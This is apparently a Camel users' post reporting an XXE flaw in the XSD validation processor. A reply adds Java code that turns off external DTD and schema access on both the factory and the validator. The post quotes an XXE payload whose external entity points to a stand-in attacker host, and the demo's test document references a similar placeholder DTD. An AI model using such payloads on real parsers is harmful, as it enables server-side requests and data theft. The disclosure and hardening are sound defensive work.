XML External Entity (XXE) - validator vulnerability?
We are using the XSD validation processor from the camel-core library.
Our penetration tests found that the application can be attacked by "XML
External Entity (XXE)".
We think that the classes infected by this vulnerability are:
Method SchemaReader.createSchemaFactory should also set property
Method ValidatingProcessor.doProcess should set property to validator class
Validator validator = schema.newValidator();
//prevent XXE attack
If we try to validate an infected XML against the XSD, we can see that Camel is
trying to access an external site (attackers.site in this example):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
Disabling the mentioned properties should do the trick.
I would like to ask you whether this will be created as a security BUG in
Camel and whether it will be fixed in a future version.
Can we use some workaround? Write our own custom implementation of
ValidatingProcessor? Is it possible?
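As an added illustration of the two settings the post points at (hardening the SchemaFactory and then the Validator it produces), here is a standalone helper that does the same job outside Camel. This is example code written for this reply, not the poster's code and not Camel's ValidatingProcessor; it assumes the JDK's built-in JAXP implementation (Java 7u40 or later, where XMLConstants.ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA exist), and the class name SecureXsdValidator, the inline schema and the host attackers.example are all made up for the demonstration.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.xml.sax.SAXException;

/** Hypothetical helper: builds a Validator that refuses to fetch external DTDs and schemas. */
public final class SecureXsdValidator {

    private final Schema schema;

    public SecureXsdValidator(String xsdText) throws SAXException {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        // JAXP 1.5 properties: an empty string means "no protocol allowed at all".
        // This is the factory-level step (the SchemaReader.createSchemaFactory side).
        // If the parser does not recognise the property, setProperty throws and we
        // fail closed instead of silently validating with an unhardened factory.
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        this.schema = factory.newSchema(new StreamSource(new StringReader(xsdText)));
    }

    /** Validates xmlText against the schema; throws on a schema violation or an external fetch attempt. */
    public void validate(String xmlText) throws Exception {
        // The Validator is a separate object with its own settings, so the factory
        // properties do not carry over: they must be set again here (the
        // ValidatingProcessor.doProcess side).
        Validator validator = schema.newValidator();
        validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        validator.validate(new StreamSource(new StringReader(xmlText)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample schema: a single <root> element holding a string.
        String xsd = "<?xml version=\"1.0\"?>"
            + "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">"
            + "<xs:element name=\"root\" type=\"xs:string\"/>"
            + "</xs:schema>";
        SecureXsdValidator v = new SecureXsdValidator(xsd);

        // 1) Benign document: passes validation.
        v.validate("<?xml version=\"1.0\"?><root>hello</root>");
        System.out.println("benign document: valid");

        // 2) Constructed document whose DOCTYPE points at an external DTD on a
        //    placeholder host: rejected by the parser before any network access.
        String external = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE root SYSTEM \"http://attackers.example/evil.dtd\">"
            + "<root>hello</root>";
        try {
            v.validate(external);
            System.out.println("UNEXPECTED: document with external DTD was accepted");
        } catch (SAXException e) {
            System.out.println("external DTD rejected: " + e.getMessage());
        }
    }
}
```

The point to notice is the second setProperty pair: hardening only the SchemaFactory is not enough, because schema.newValidator() returns a fresh object with default (permissive) access settings, which is exactly why the post lists both SchemaReader.createSchemaFactory and ValidatingProcessor.doProcess. A custom Camel Processor could wrap this class and call validate() on exchange.getIn().getBody(String.class) as a workaround until the library itself sets the properties.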